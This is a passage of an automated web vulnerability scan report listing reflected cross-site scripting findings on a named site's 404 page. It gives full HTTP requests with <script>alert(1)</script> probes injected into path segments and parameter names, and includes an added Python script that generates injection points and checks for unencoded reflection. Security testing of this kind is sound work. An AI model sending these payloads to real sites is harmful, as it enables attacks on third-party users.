This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=2&9edf4<script>alert(1)</script>86f6eeee724=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=2&9edf4<script>alert(1)</script>86f6eeee724=1 was not found on this server.</p>
...[SNIP]...

2.4076. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 67086<a>e376dd686eb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=267086<a>e376dd686eb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=267086<a>e376dd686eb was not found on this server.</p>
...[SNIP]...

2.4077. http://www.resellerbase.com/resources-information/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d00a5<script>alert(1)</script>7c0a57dd497 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationd00a5<script>alert(1)</script>7c0a57dd497/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationd00a5<script>alert(1)</script>7c0a57dd497/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4078. http://www.resellerbase.com/resources-information/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c93b<script>alert(1)</script>c6852c76d33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/search.php5c93b<script>alert(1)</script>c6852c76d33?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/search.php5c93b<script>alert(1)</script>c6852c76d33?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4079. http://www.resellerbase.com/resources-information/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1a5d0<a>5a11755d175 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/search.php?keyword=search...&Submit3=Search1a5d0<a>5a11755d175&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/search.php?keyword=search...&Submit3=Search1a5d0<a>5a11755d175&opt=2 was not found on this server.</p>
...[SNIP]...

2.4080. http://www.resellerbase.com/resources-information/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ead14<a>f5938147bec was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/search.php?keyword=search...ead14<a>f5938147bec&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/search.php?keyword=search...ead14<a>f5938147bec&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4081. http://www.resellerbase.com/resources-information/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 39db5<script>alert(1)</script>056a870adde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/search.php?keyword=search...&Submit3=Search&opt=2&39db5<script>alert(1)</script>056a870adde=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/search.php?keyword=search...&Submit3=Search&opt=2&39db5<script>alert(1)</script>056a870adde=1 was not found on this server.</p>
...[SNIP]...

2.4082. http://www.resellerbase.com/resources-information/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 87343<a>b863a3b5c8b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/search.php?keyword=search...&Submit3=Search&opt=287343<a>b863a3b5c8b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/search.php?keyword=search...&Submit3=Search&opt=287343<a>b863a3b5c8b was not found on this server.</p>
...[SNIP]...

2.4083. http://www.resellerbase.com/resources-information/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/

Issue detail

The value of REST URL parameter 1 (the first path segment, resources-information) is copied into the HTML document as plain text between tags. The payload 1537b<script>alert(1)</script>1cdb5fdb77e was submitted in the REST URL parameter 1, appended to that segment. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The sink is the site's 404 page, which appears to be a custom PHP error handler (XHTML doctype, "Error 404" title, X-Powered-By: PHP/5.2.14 header) and which writes the requested URL into a <p> element without HTML encoding. The same sink is reached from every path segment and from any query parameter name of any non-existent URL under this host, so the issues that follow against /resources-information/themes/, /resources-information/themes/kosmos/ and the paths beneath them are one defect with one fix: HTML-encode the request URI before it is written into the page.

Request

GET /resources-information1537b<script>alert(1)</script>1cdb5fdb77e/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information1537b<script>alert(1)</script>1cdb5fdb77e/themes/ was not found on this server.</p>
...[SNIP]...
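
The following Python script is an added example, not part of the original report and not code from the scanner or from the target site. It reproduces, offline, what issues 2.4083 through 2.4104 show: the scanner appends a canary to each path segment in turn ("REST URL parameter N") and then uses it as the name of an extra query parameter, and the 404 page reflects whichever copy it receives. render_404 is a hypothetical stand-in for the site's error page (the real PHP source is not in the report); with escape=False it reproduces the observed defect, with escape=True it applies the fix. classify_reflection then distinguishes an unencoded reflection in an HTML response (exploitable) from an entity-encoded one, a reflection in a non-HTML response, and no reflection at all. The canary and URLs are taken from the report; the sample bodies are constructed.

```python
import html
from urllib.parse import urlsplit, urlunsplit

# Canary of the same shape as the scanner's payloads in this report: random prefix,
# a <script> element, random suffix, so a verbatim hit in a body is unambiguous.
# The value is the one from issue 2.4083.
CANARY = "1537b<script>alert(1)</script>1cdb5fdb77e"

PARAM_NAME_LABEL = "name of an arbitrarily supplied request parameter"


def inject_into_url(url, canary=CANARY):
    """Return [(insertion_point_label, mutated_url), ...] for one target URL.

    Mirrors the insertion points seen in this report: the canary is appended to each
    non-empty path segment ("REST URL parameter N", 1-based), then used as the name of
    an extra query parameter ("?<canary>=1", or "&<canary>=1" if a query exists).
    """
    parts = urlsplit(url)
    segments = parts.path.split("/")
    mutations = []
    n = 0
    for i, seg in enumerate(segments):
        if seg == "":
            continue  # empty strings around the slashes are not segments
        n += 1
        mutated = segments[:i] + [seg + canary] + segments[i + 1:]
        mutations.append(("REST URL parameter %d" % n,
                          urlunsplit(parts._replace(path="/".join(mutated)))))
    query = (parts.query + "&" if parts.query else "") + canary + "=1"
    mutations.append((PARAM_NAME_LABEL, urlunsplit(parts._replace(query=query))))
    return mutations


def render_404(request_uri, escape=True):
    """Hypothetical stand-in for the site's PHP 404 page (its real source is not in the report).

    escape=False reproduces the defect: the request URI is concatenated into the HTML
    unmodified. escape=True is the fix, equivalent to PHP's
    htmlspecialchars($uri, ENT_QUOTES, 'UTF-8').
    """
    shown = html.escape(request_uri, quote=True) if escape else request_uri
    return "<p>The requested URL %s was not found on this server.</p>" % shown


def classify_reflection(body, canary=CANARY, content_type="text/html"):
    """Classify how a response reflects the canary.

    'unencoded': verbatim copy in an HTML response -> reflected XSS.
    'non-html' : verbatim copy, but not served as HTML (no script execution there).
    'encoded'  : only an entity-encoded copy -> output encoding is in place.
    'absent'   : no reflection at all.
    """
    if canary in body:
        is_html = content_type.split(";")[0].strip().lower() == "text/html"
        return "unencoded" if is_html else "non-html"
    encoded_forms = {html.escape(canary, quote=True), html.escape(canary, quote=False)}
    if any(form in body for form in encoded_forms):
        return "encoded"
    return "absent"


if __name__ == "__main__":
    target = "http://www.resellerbase.com/resources-information/themes/"
    for label, mutated in inject_into_url(target):
        # Offline run: the body is constructed with render_404 instead of being fetched.
        m = urlsplit(mutated)
        path_and_query = m.path + ("?" + m.query if m.query else "")
        for escape in (False, True):
            verdict = classify_reflection(render_404(path_and_query, escape=escape))
            print("%-50s escape=%-5s -> %s" % (label, escape, verdict))
```

Two caveats when using this against a live host: only a verdict of "unencoded" on a text/html response is reflected XSS, so keep the Content-Type header in the decision rather than grepping the body alone; and the requests in this report put `<` and `>` on the wire literally, so when reproducing from a browser rather than a raw HTTP client, confirm what the browser actually sends for those characters in the path before concluding that a finding does or does not reproduce.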

2.4084. http://www.resellerbase.com/resources-information/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e59f<script>alert(1)</script>6ca6825b1fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes1e59f<script>alert(1)</script>6ca6825b1fe/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes1e59f<script>alert(1)</script>6ca6825b1fe/ was not found on this server.</p>
...[SNIP]...

2.4085. http://www.resellerbase.com/resources-information/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 146ef<script>alert(1)</script>e60e84b4a7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/?146ef<script>alert(1)</script>e60e84b4a7d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/?146ef<script>alert(1)</script>e60e84b4a7d=1 was not found on this server.</p>
...[SNIP]...

2.4086. http://www.resellerbase.com/resources-information/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86bbf<script>alert(1)</script>69093353b30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information86bbf<script>alert(1)</script>69093353b30/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information86bbf<script>alert(1)</script>69093353b30/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4087. http://www.resellerbase.com/resources-information/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cd14<script>alert(1)</script>25ec8083983 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes9cd14<script>alert(1)</script>25ec8083983/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes9cd14<script>alert(1)</script>25ec8083983/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4088. http://www.resellerbase.com/resources-information/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7c0ad<script>alert(1)</script>b743fdfb47c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos7c0ad<script>alert(1)</script>b743fdfb47c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos7c0ad<script>alert(1)</script>b743fdfb47c/ was not found on this server.</p>
...[SNIP]...

2.4089. http://www.resellerbase.com/resources-information/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a44a1<script>alert(1)</script>c0f036356c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/?a44a1<script>alert(1)</script>c0f036356c6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/?a44a1<script>alert(1)</script>c0f036356c6=1 was not found on this server.</p>
...[SNIP]...

2.4090. http://www.resellerbase.com/resources-information/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1ddb<script>alert(1)</script>1eab7e179e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationc1ddb<script>alert(1)</script>1eab7e179e6/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationc1ddb<script>alert(1)</script>1eab7e179e6/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4091. http://www.resellerbase.com/resources-information/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6f99<script>alert(1)</script>5587d337148 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themese6f99<script>alert(1)</script>5587d337148/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
